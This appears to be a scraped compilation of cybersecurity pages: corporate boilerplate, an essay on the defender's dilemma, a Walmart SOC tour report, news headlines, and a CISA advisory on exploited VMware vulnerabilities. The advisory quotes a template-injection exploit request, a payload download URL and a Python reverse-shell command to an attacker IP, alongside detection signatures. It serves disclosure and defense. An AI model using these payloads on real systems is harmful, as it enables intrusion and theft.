Category: Uncategorized

Finding better ways to provide the materials the world needs
The drive for innovation and continuous improvement is at the heart of our purpose
Finding better ways to provide the materials the world needs
Iron ore, one of the most abundant metals on Earth, is the primary raw material used to make steel
We work across six continents in around 35 countries
A long-life, low-cost and low-carbon lithium source
Providing materials the world needs in a responsible way
We see ourselves as water stewards and take that commitment seriously
We aim to deliver superior returns to our shareholders while safeguarding the environment and meeting our obligations to wider society
Annual Results 2022 released
Get the latest news, stories and updates
Tackling a global challenge
Discover more about life at Rio Tinto
We are looking for curious and creative minds who want to bring different perspectives into our company
We invest in enhancing our cyber security measures, ensuring we adapt not only to new and emerging technologies and cyber threats, but also to continue to improve the resilience of our business operations overall.
We respect every person’s privacy and comply with all relevant laws in the collection, use and protection of personal information in connection with our business.
When we work with others who may see or process our data – from business partners to suppliers, to customers – we make clear how important privacy is to us and the standards they must meet to work with us. We only collect and handle personal information when needed, and only for legitimate business purposes.
We have identified cyber security as a principal operational risk with potential to impact people, environment, community and operational performance – including our supply chain.
Our Cyber Security Steering Committee (CSSC) is our primary governance body overseeing cyber security. The CSSC, which reports to the Group’s Executive Committee, is responsible for our cyber strategy and provides oversight for Group-wide initiatives.  
We invest in our information systems and technology infrastructure and teams to advance our digital agenda while also safeguarding our assets. Key measures include:
Maintaining strong cyber security awareness is more important than ever. We have improved our cyber security training and awareness programme, including improving the quality of our Group-wide mandatory training to address specific risks, continuous engagement of cyber security topics through various internal channels and forums, targeted campaigns (including about phishing trends and campaigns), executive briefings and tailored support for key business areas.
Our businesses are required to maintain business resilience management plans to support major incident response and recovery, including cyber security events. We also have a dedicated business resilience management plan for our Information Services and Technology function, which is tested annually.
At the heart of our sustainability strategy – and our business – are our people and their safety
We harness new and emerging technologies to make our operations more efficient, safer and more environmentally friendly
As consumers become more mindful of the sustainability of the products they choose, they want reassurance that the materials consumed reflect responsible practices throughout the value chain
© Rio Tinto 2023. All Rights Reserved.
How we process personal data provided or obtained through this website.
With the exception of the use of cookies, Rio Tinto generally does not seek to collect personal data through this website.  

However if you choose to provide personal data to Rio Tinto through this website (for example, by sending us an email), we will process that personal data to answer your query and if relevant, to manage our business relationship with you or your company. We won’t process that personal data for other purposes except where required to meet our legal obligations or otherwise as authorised by law and notified to you.
If you choose to subscribe to our media releases or other communications, you can unsubscribe at any time (by following the instructions in the email or by contacting us).
With your consent, our website uses cookies to distinguish you from other users of our website. This helps us to provide you with a good experience when you browse our website and also allows us to improve our site.

A cookie is a small file of letters and numbers that we store on your browser or the hard drive of your computer if you agree. Cookies contain information that is transferred to your computer’s hard drive.
As some data privacy laws regulate IP addresses and other information collected through the use of cookies as personal data, Rio Tinto’s processing of such personal data needs to comply with its Data Privacy Standard (see Part 1 of our Privacy Policy), and also applicable data privacy laws.
 
With the exception of the use of cookies (explained below), Rio Tinto generally does not seek to collect personal data through this website.  
However if you choose to provide personal data to Rio Tinto through this website (for example, by sending us an email), we will process that personal data to answer your query and if relevant, to manage our business relationship with you or your company. We won’t process that personal data for other purposes except where required to meet our legal obligations or otherwise as authorised by law and notified to you.
Part 1 of this Privacy Policy contains the Rio Tinto Data Privacy Standard, which provides an overview of Rio Tinto’s approach to personal data processing. There is additional information in the appendices to the Data Privacy Standard, including information about disclosures, trans-border data transfers, the exercise of data subject rights and how to make complaints or obtain further information relating to Rio Tinto’s processing of your personal data.
If you choose to subscribe to our media releases or other communications, you can unsubscribe at any time (by following the instructions in the email or by contacting us at digital.comms@riotinto.com).
 
With your consent, our website uses cookies to distinguish you from other users of our website. This helps us to provide you with a good experience when you browse our website and also allows us to improve our site.
A cookie is a small file of letters and numbers that we store on your browser or the hard drive of your computer if you agree. Cookies contain information that is transferred to your computer’s hard drive.
As some data privacy laws regulate IP addresses and other information collected through the use of cookies as personal data, Rio Tinto’s processing of such personal data needs to comply with its Data Privacy Standard (see Part 1 of this Privacy Policy), and also applicable data privacy laws.
These Cookies are used to provide a better user experience on the site, such as by measuring interactions with particular content or remembering your settings such as language or video playback preferences.
These Cookies allow us to analyse site usage in order to evaluate and improve its performance. They help us know how often you come to our site and when, how long you stay and any performance issues you experience whilst you are on our site.
These Cookies are used by advertising companies to inform and serve personalised ads to your devices based on your interests. These Cookies also facilitate sharing information with social networks or recording your interactions with particular ads.

source

Does ChatGPT Pose A Cybersecurity Threat? Here’s The AI Bot’s Answer  Forbes
source

Practically every security professional has run across “the defender’s dilemma” sometime in their career. It goes like this: “Defenders have to be right every time. Attackers only need to be right once.”
The idea that attackers have all the advantages and that defenders must be passive and wait for something to respond to is practically an axiom of cybersecurity.
It is also a lie.
Basing a security strategy around the defender’s dilemma harms your security program. Starting with an incorrect premise leads to bad decisions. You may waste money on products, services or capabilities you don’t truly need or underinvest in the ones you do. Your security staff becomes overwhelmed, demoralized and has trouble delivering good outcomes.

If you believe the lie of the defender’s dilemma, there are other lies you have to believe as well because the defender’s dilemma relies upon them. Let’s look at each of these lies in detail and discuss strategies you can use to negate their harmful effects and turn them into advantages for your team.
The defender’s dilemma implies that your security team is purely passive, sitting around waiting for attacks to happen. But thinking in terms of “defense” and “offense” is a false dichotomy.
The shows that by consistently detecting and responding to threat actor activity quickly enough to stop attacks in their tracks, you can impose cost on that actor, turning defense into offense. By concentrating your detection development efforts on the top half of the pyramid, you may not be able to prevent attacks entirely, but you will make actors work harder to be successful. That changes the economics of their attacks and also buys you valuable time to respond.
Your defenses must operate around the clock, while attackers can carefully choose the timing of their attacks to occur on evenings, weekends or holidays. That doesn’t mean humans always have to be engaged for everything, though.
Automation and SOAR technology can turn IR playbooks into an automated response. Driving an incident to containment within seconds or minutes of detection and collecting basic IR data along the way improves time-to-containment and significantly decreases reliance on off-hours staffing.
Consider also what each side is doing in between attacks. While threat actors plan their next attacks, your team should not be sitting idle. Use the time between incidents to level up group capabilities and individual skills. Learn from past incidents to improve detection and playbooks. Take classes or learn new skills. Use threat hunting to identify new detection or IR techniques. What you might have fallen prey to yesterday could be something you detect and interdict tomorrow.

source

The David Glass Technology Center, headquarters to Walmart Global Tech, in Bentonville, Ark. (Bradley Barth/SC Media)
The following is the Foreword and Part 1 of a three-part series revealing key highlights from Walmart Global Tech’s Media Day, compiled from a series of on-site tours, fireside chats, panels, roundtables and one-on-one interviews.
Bookended by security personnel in front and back, we were warned in no uncertain terms before entering Walmart’s East Data Center facility: Any attempt to bring an electronic device into the building would result in our immediate expulsion.
The caution was understandable. We were, after all, the first-ever visitors who were not a Walmart employee or vendor partner to step foot in this building, where the retail giant’s precious data is collected and processed. This was serious business for the $572.8 billion Fortune 1 company, who invited a small gaggle of reporters to Walmart headquarters in Bentonville, Arkansas, for Walmart Global Tech’s (WGT) inaugural media day.
Before the day was over, we also were treated to a tour of the on-site security operations center (SOC) and a forensics lab — both located in the David Glass Technology Center, the main headquarters for WGT, Walmart’s internal technology and business services division.
The event also served as an opportunity to talk to WGT’s top cyber and IT executives about their efforts to innovate as a security and tech leader in a manner that can scale with the retailer’s ongoing world dominance. With roughly 10,500 stores, plus various eCommerce websites under 46 banners in 24 countries, Walmart is not only king in the retail space — it also operates in the health and financial sectors, and has its own manufacturing, distribution and logistics operations to account for.
So why the sudden willingness to offer the world an inside glimpse of its security operations? According to senior vice president and global CISO Jerry Geisler, it’s all about Walmart’s desire to prove to customers and clients that the company is working hard to earn their trust.
As an omnichannel retailer, Walmart is aware of how the lines between digital and physical commerce have blurred.
“With my teams, when we’re thinking about digital trust, of course were thinking end-to-end. We’re thinking everywhere we would potentially interact with that customer, when and where they would share data with us, and then how we use that data,” Geisler said. “How is it that we use or protect the data that our customers choose to entrust us with? And more so: How we’re potentially using emerging tech… because we want to enable the business, and part of that enablement is ensuring that we don’t have disruptive events that erode trust.”
The first sight that caught our eye as we left the reception lobby and marched through the David Glass Technology Center were three trampolines sitting side by side in a cavernous interior space. Wow — is this the most fun place to work or what?
OK, so actually this was not an office perk, but rather the work of merchandisers who are constantly experimenting with products that ultimately wind up in the stores. And it’s not unusual to see all sorts of unique items being tested on site. There’s always something going on at the Walmart campus, and that’s certainly true on the technology side of things.
The data center: Despite being connected via an intermediary passageway, the East Data Center is technically inside a completely separate building from the DWTC, requiring a stringent security check-in process. Only about 1,000 people per year set foot inside (and typically an NDA is involved), but never anyone from the media — until this day.
First stop: the C-Floor server room, home to highly sensitive and invaluable threat data leveraged by the incident response team and OneLab forensics teams (other corporate data is stored on the A- and B-Floors).
This area featured multiple protections against potential physical harm, including a floor-to-ceiling caged partition, leak detection cables and sticky anti-contamination doormats to reduce electrostatic discharge and loose dust particles (“You’ll be working in your socks before you know it,” remarked tour leader Kevin McCoin, distinguished architect, systems engineering, referring to the shoe-stealing sticky mats). The floor was elevated three feet above the concrete base to allow for better air circulation flow, helping to conduct heat from the hot servers outside and cool air back in.
Moving further inside, we were escorted into a long corridor featuring the critical infrastructure plant facilities designed to keep the servers operating through a series of pumps, motors and industrial controls. There’s a mission statement on wall in this area: to “provide data center capability and operate data centers in a manner that sustains a highly available and uninterrupted business operation.”
Different sections of this facility are fully segregated so that if a problem occurs in one section, the others are not affected. The goal is nothing short of 100 percent uptime, and multiple redundancies are the key. If one particular mechanism or system experiences downtime, Walmart relies on built-in automation and AI/machine learning to switch to one of the redundancies, thus maintaining operational stability and continuity.
We next were ushered over to the B-Floor’s private cloud server room for a fleeting glimpse inside, although we were only allowed to peek from just outside. Just like on the C-Floor, the room works on a grid system — like a big game of Battleship — to help facility workers know exactly where to go to if a problem arises.
Walmart has made news lately for pursuing a hybrid cloud computing strategy that is increasingly relying on its own private cloud, while mixing in public cloud offerings and edge nodes for ultimately flexibility in what cloud-based resources it uses.
The SOC: Including this one, Walmart actually operates three SOCs around the world (with the other two in Reston, Virginia, and Bangalore, India). Inside the main hub, the walls were adorned with large screens displaying timely cyber news media articles, the latest vulnerabilities sorted by company and product, summaries of zero-day exploits, and other vital info. Just outside, a hanging whiteboard noted the number of days since the last significant security incident. However, it was completely wiped clean — perhaps in anticipation of the media’s arrival?
Walmart’s SOC processes roughly 6 trillion points of telemetry and monitors approximately 3 million IP addresses in its network, plus roughly 167,000 public and private GitHub repositories. This requires a tremendous amount of automated monitoring correlation, detection and response mechanisms to aid the various teams that collaborate on security operations.
Inside a conference room, the heads of these teams laid out for the media a fictionalized scenario in which an imaginary, financially motivated cyber actor sent fake browser updates to Walmart associates in an attempt to get them to open a malicious file infected with a RAT, infostealer or Cobalt Strike file — an intermediary step for a ransomware attack.
It starts with threat intelligence team who creates reports based on the latest available commercial feeds as well as its own collection of TTPs, IOCs and other data points gathered via frameworks like MITRE ATT&CK.
The threat hunting team uses this intelligence to proactively sniff out threat actors that might be using these identified techniques, and they coordinate with the anomalous endpoint behavior team to spot rare or unusual activity that is indicative of a possible threat. As Vice President of Security Operations Jason O’Dell explained, the corporate philosophy is: “Rare isn’t always bad, but bad should always be rare.”
And although threat actors are getting better at hiding their malicious traffic, “something’s gonna stand out,” said Vernon Habersetzer, senior enterprise expert, security incident management.
If an alert is generated through either hunting or through traditional detection and response, the SOC analyst team is on hand to analyze a potential threat and then either take action, elevate to incident response or declare a false positive. From these analysis results, Walmart can then create custom detections for future protection.
There’s also an engineering team that maintains and stewards the 6 trillion datapoints; a data assurance team that spearheads data loss prevention (they weren’t part of the simulation); and an incident response team that handles containment and threat eradication, much of which is automated if Walmart’s systems detect flagged behavior.
Finally, there’s a red team, which is tasked with attacking the organization throughout the year to see “how all the controls put in place… stack up,” noted Harold Ogden, red team senior director. Recently, Walmart made the strategic move to move the red team — which had been operating as a more segregated entity — in-house in order to create a more collaborative purple teaming environment. (For more on this, see SC Media’s video interview with Jason O’Dell.)
The forensics lab. The tools and machines found in WGT’s hardware forensics lab environment evoke, in essence, a living museum environment that showcases the chronology of device repair and data recovery. This is where malfunctioning or damaged devices and drives end up when the company needs to salvage data from them for reasons ranging from legal discovery to security investigations to personal file restoration. Altogether, the forensics teams fulfills more than 3,000 various requests per year.
Inside the room were soldering stations, microscopes, ultrasonic wire bonders, X-ray machines capable of peering into the 10 different layers of smartphones, and a clean room when a contaminant-free working environment is needed. Several monitors displayed extreme close-ups of chips and circuits from various electronics currently under examination (or perhaps placed there simply as a visual demonstration for us).
As hardware changes, improves and gets smaller, the equipment used to examine it must evolve as well. Over the years, Walmart has found that it’s ideal to handle such tasks internally, rather than rely on a third party, which presents complications related to chain of custody, data privacy and expense, explained Wayne Murphy, distinguished architect, systems engineering, and hardware recovery expert.
Indeed, that just as Walmart realized there were advantages to setting up its own distribution and manufacturing operations, Walmart has resolved to become a self-reliant corporation when it comes to data collection, cybersecurity and forensics. Considering its vast resources and infrastructure, Walmart probably could form its own managed IT and cyber services company if it so desired. And at this point, would it even be surprising if they did?
Stay tuned for Part 2 of SC Media’s Walmart Global Tech Media Day coverage, featuring the retailer’s latest cyber innovations and initiatives.
As director of community content at CyberRisk Alliance, Bradley Barth develops content for SC Media online conferences and events, as well as video/multimedia projects. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
February 21, 2023
SC StaffMarch 2, 2023
SiliconAngle reports that Fortinet has introduced more offerings under its Security Fabric for OT line aimed at bolstering operational technology environments’ security defenses.
Steve ZurierMarch 2, 2023
One of bugs was a critical vulnerability that could potentially launch an RCE attack, the other a high-severity vulnerability that could execute a denial-of-service attack.
Wed Mar 15Wed Mar 15
On-Demand Event
On-Demand Event
By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.
Copyright © 2023 CyberRisk Alliance, LLC All Rights Reserved. This material may not be published, broadcast, rewritten or redistributed in any form without prior authorization.
Your use of this website constitutes acceptance of CyberRisk Alliance Privacy Policy and Terms & Conditions.

source

Bloomberg View columnist Barry Ritholtz looks at the people and ideas that shape markets, investing and business.
On this week’s episode of IDEA GENERATION, Scooter Braun takes us on a journey from his days as a college dropout and party promoter in Atlanta, to becoming one of the most successful music executives on the planet. From his time as manager of Justin Bieber and Asher Roth, to his part in acquiring Big Machine Records, to selling his own company for $1 billion, Braun has built one of the most impressive resumes in music. And it all started with one idea.
Japanese Unions Seek Biggest Pay Rise in 25 Years for Workers
Colombian Oil Field Kidnapping Ends as Dozens of Hostages Freed
Sorry, Fed, Most US Mortgage Rates Were Locked in During Pandemic Lows
Fed Says More Rate Hikes Are Needed to Curb Inflation
US Service Sector Expands More Than Forecast Suggesting Hiring Success
Amazon Pauses Construction on Second Headquarters in Virginia as It Cuts Jobs
The Exhibit Reality TV Show Pitting Artist Against Artist Is No Masterpiece
Twitter Revenue, Earnings Fell About 40% in December, WSJ Says
Alphabet Must Negotiate If Contract Staff Unionize, Labor Board Official Rules
US-Sanctioned Huawei Makes a Show of Force at Mobile Conference
Biden’s About-Face on DC Crime Bill Shows Democrats on Defensive
Biden Had Cancerous Skin Lesion Removed
Wealthy NYC Family Feuds Over $258 Million Madison Avenue Sale
NYC TikTok Dating Diary Chronicles Love in the Time of Inflation
The Exhibit Reality TV Show Pitting Artist Against Artist Is No Masterpiece
Toblerone Is Barred From Using the Iconic Swiss Mountain on Its Logo
Video Roundup: Opinion’s Must-See Footage of the Week
A Postmortem of the Pandemic Murder Wave
How Democrats Got Away From ‘Third Way’ Politics
Yellowstone Backers Wanted to Cash Out—Then the Streaming Bubble Burst
How Countries Leading on Early Years of Child Care Get It Right
Female Execs Are Exhausted, Frustrated and Heading for the Exits
Biden Gives Medal of Honor to Trailblazing Special Forces Member
California Weighs $360,000 in Reparations to Eligible Black Residents. Will Others Follow?
Panic Over Metals for EVs Goes All the Way to Automakers’ C-Suites
Rivian Tells Staff EV Output May Be 24% More Than Forecast
What Do You Want to See in a Covid Memorial? Share Your Design Ideas
New Jersey’s Murphy Defends $10 Billion Rainy Day Fund as State’s Economy Slows
What Led to Europe’s Deadliest Train Crash in a Decade
This Week in Crypto: Ukraine War, Marathon Digital, FTX
AI Hype Comes to Crypto
What’s a ‘Britcoin’? (Podcast)
Sarah Jacob
Subscriber Benefit
Subscribe
UK engineering company Vesuvius Plc said it’s managing a cyber-security incident involving unauthorized access to its systems.
The molten metal flow control firm has shut down affected systems and initiated steps to assess the scale of the attack, it said in a statement on Monday. The shares fell as much as 3.1% in early trading in London.

source

Ideas are the global currency of the 21st century. But how do you come up with, execute, operationalize and replicate one? The answers are what separates successful creative influences from everyone else.
Bloomberg Business of Sports lets you follow the money in the world of sports, reporting on trades, salaries, endorsements, contracts and collective bargaining. The show takes listeners inside the business end of the sports world, and explains what it means to fans and their pocketbooks.
Follow Bloomberg reporters as they uncover some of the biggest financial crimes of the modern era. This documentary-style series follows investigative journalists as they uncover the truth.
Credit Suisse First Boston Will Have Goldman Sachs-like Partners
Westlake to Take Over Servicing of American Car Center’s Leases
Sorry, Fed, Most US Mortgage Rates Were Locked in During Pandemic Lows
Fed Says More Rate Hikes Are Needed to Curb Inflation
US Service Sector Expands More Than Forecast Suggesting Hiring Success
Amazon Pauses Construction on Second Headquarters in Virginia as It Cuts Jobs
Bed Bath & Beyond’s Tanking Stock Puts Hedge Fund Rescue at Risk
Alphabet Must Negotiate If Contract Staff Unionize, Labor Board Official Rules
US-Sanctioned Huawei Makes a Show of Force at Mobile Conference
John Malone and Charter Directors Agree to $87.5 Million Settlement
Biden’s About-Face on DC Crime Bill Shows Democrats on Defensive
Biden Had Cancerous Skin Lesion Removed
Wealthy NYC Family Feuds Over $258 Million Madison Avenue Sale
NYC TikTok Dating Diary Chronicles Love in the Time of Inflation
The Exhibit Reality TV Show Pitting Artist Against Artist Is No Masterpiece
Toblerone Is Barred From Using the Iconic Swiss Mountain on Its Logo
Video Roundup: Opinion’s Must-See Footage of the Week
A Postmortem of the Pandemic Murder Wave
How Democrats Got Away From ‘Third Way’ Politics
Yellowstone Backers Wanted to Cash Out—Then the Streaming Bubble Burst
How Countries Leading on Early Years of Child Care Get It Right
Female Execs Are Exhausted, Frustrated and Heading for the Exits
Biden Gives Medal of Honor to Trailblazing Special Forces Member
California Weighs $360,000 in Reparations to Eligible Black Residents. Will Others Follow?
Rivian Tells Staff EV Output May Be 24% More Than Forecast
Emergency Workers in Ohio Train Derailment Lacked Crucial Hazmat Data
What Do You Want to See in a Covid Memorial? Share Your Design Ideas
New Jersey’s Murphy Defends $10 Billion Rainy Day Fund as State’s Economy Slows
What Led to Europe’s Deadliest Train Crash in a Decade
This Week in Crypto: Ukraine War, Marathon Digital, FTX
AI Hype Comes to Crypto
What’s a ‘Britcoin’? (Podcast)
A screenshot from the ION website. 
William Shaw
Subscriber Benefit
Subscribe
The National Cyber Security Center, part of UK intelligence agency Government Communications Headquarters, is part of the growing number of government bodies examining the cyberattack on ION Trading UK.
The NCSC joins the Financial Conduct Authority, the Prudential Regulation Authority and the US Federal Bureau of Investigation in seeking information about the incident, according to people familiar with the matter, who aren’t authorized to speak publicly.

source

We’re taking a look at the cybersecurity companies that launched products and partner program updates, made key executive changes, raised funding or announced acquisitions in January.
While plenty of cybersecurity companies have been among the tech industry vendors recently announcing layoffs, many companies in the security market had happier news to announce in kicking off 2023. In January, major moves by cybersecurity companies included executive changes, such as CrowdStrike’s hiring of two C-level executives from rival endpoint security vendor SentinelOne.
[Related: Okta Lays Off 5 Percent Of Staff]
Meanwhile, a number of cybersecurity vendors announced channel-friendly products, such as Arctic Wolf, while others unveiled updates to their partner programs, including Palo Alto Networks. A few raised funding, including Snyk’s funding round from ServiceNow, while NetSPI was among the handful of cybersecurity companies to announce an acquisition in spite of the uncertain economic environment.
What follows are details on 10 of the cybersecurity companies we’re following that made moves in January.
Kyle Alspach is a Senior Editor at CRN focused on cybersecurity. His coverage spans news, analysis and deep dives on the cybersecurity industry, with a focus on fast-growing segments such as cloud security, application security and identity security.  He can be reached at kalspach@thechannelcompany.com.

source

An official website of the United States government
Here’s how you know
Official websites use .gov
A .gov website belongs to an official government organization in the United States.
Secure .gov websites use HTTPS
A lock () or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.
Search
Update June 2, 2022:
This Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. 
Update End
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 
VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively
Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including IOCs—about observed exploitation at multiple other large organizations from trusted third parties.
This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. 
Update June 2, 2022:
This CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. 
Update End
Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.
Download the PDF version of this report (pdf, 349kb).
For a downloadable copy of IOCs, see AA22-138B.stix. 
CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.
According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. 
Update June 2, 2022:
For more information about this compromised organization, see the Victim 1 section.
Update End
Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.
Update June 2, 2022:
The following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.
The trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server (without automation or scripts) and installed multiple webshells and a reverse secure socket (SOCKS) proxy.
On April 12, TA1 exploited CVE 2022-22954 [T1203] to download [T1105] a malicious shell script [T1059] from https://20.232.97[.]189/up/80b6ae2cea.sh. 
TA1 first targeted Freemarker—a legitimate application that allows for customized notifications by creating templates—to send the following customized GET request URI to the compromised server [T1071.001]:
GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7DHTTP/1.1
The GET request resulted in the server downloading the malicious shell script, 80b6ae2cea[.]sh, to VMware Workspace ONE Access directory /usr/local/horizon/scripts/. TA1 then chained CVE 2022-22960 to the initial exploit to run the shell script with root privileges ([T1068], [TA0004]). The script was executed with the SUDO command.
The script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [TA0010]. The malicious script collected [TA0009] sensitive files–including user names, passwords, master keys, and firewall rules–and stored them in a “tar ball” (a “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration) [T1560]. The tar ball was located in a VMWare Workspace ONE Access directory: /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/.
The malicious script then deleted evidence of compromise [TA0005] by modifying logs to their original state and deleting files [T1070]. TA1 deleted many files and logs, including fd86ald0.pem,  localhost_access logs, logs associated with the VMWare Horizon application, and greenbox logs for the date of activity (April 12).  
Note: CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.
On April 12, TA1 also downloaded jtest.jsp, a JSP webshell, to the server’s web directory /SAAS/Horizon/js-lib/ from IP address 186.233.187[.]245.
TA1 returned to the server on April 12 to collect sensitive data stored in the “tar ball” by GET request.
On April 13 and 14, TA2 sent many GET requests to the server exploiting—or attempting to exploit—CVE 2022-22954 to obtain RCE, upload binaries, and upload webshells [T1505.003] for persistence [TA0003].
The trusted third party found two copies of the Dingo J-spy webshell (MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a) in web directories: horizon_all.jsp was in the /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/ web directory and jquery.jsp was in the /webapps/cas/static/ directory. The third party was unable to determine how and when the webshells were created. TA2 used POST requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [T1573.001].
On April 14, TA2 downloaded a reverse SOCKS proxy [T1090]. TA2 first sent a GET request with the CHMOD command to change the permissions of .tmp12865xax, a hidden file in the /tmp directory [T1222.002]. The actor then downloaded a binary (MD5  dc88c5fe715b5f706f9fb92547da948a) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse socks5 tunneling binary with TLS/SSL support and connects to https://149.248.35[.]200.sslip.io.
The trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On 13 April, IP address 172.94.89[.]112 attempted to connect a reverse shell on the compromised server to IP Address 100.14.239[.]83 on port 5410. The threat actor used the following command:
freemarker.template.utility.Execute"?new()("/usr/bin/python3.7 -c  \'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);  os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"- i\"]);\'")}  
CISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE 2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as a superuser (sudo). The Bash script also allows the user to collect network information and additional information.
The script overwrites the publishCaCert.hzn script on fd86ald0.pem file and executes commands that compress a list of files containing information such as network interface configuration, list of users, passwords, masterkeys, hosts, and domains to a TAR archive. The TAR archive, located in a VMWare Workspace ONE Access directory, /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/, is assigned read and write permissions to the Horizon web user and read to all users.  
The malicious script deletes evidence of compromise by overwriting publishCaCert.hzn with fd86ald0.pem and then removing fd86ald0.pem.
The trusted third party observed the following IPs downloading, executing, and checking the bash script.
The trusted third party observed the following additional malicious IPs:
Update End
Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.
The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:
alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content: "GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954;
reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)
The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:
10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection";content:"GET"; http_method; content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:;rev:1;)
Update June 2, 2022:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside  Template Injection";content:"GET"; http_method;  content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:100000001;rev:1;)  
Update End
The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:
rule dingo_jspy_webshell
{
strings:
$string1 = "dingo.length"
$string2 = "command = command.trim"
$string3 = "commandAction"
$string4 = "PortScan"
$string5 = "InetAddress.getLocalHost"
$string6 = "DatabaseManager"
$string7 = "ExecuteCommand"
$string8 = "var command = form.command.value"
$string9 = "dingody.iteye.com"
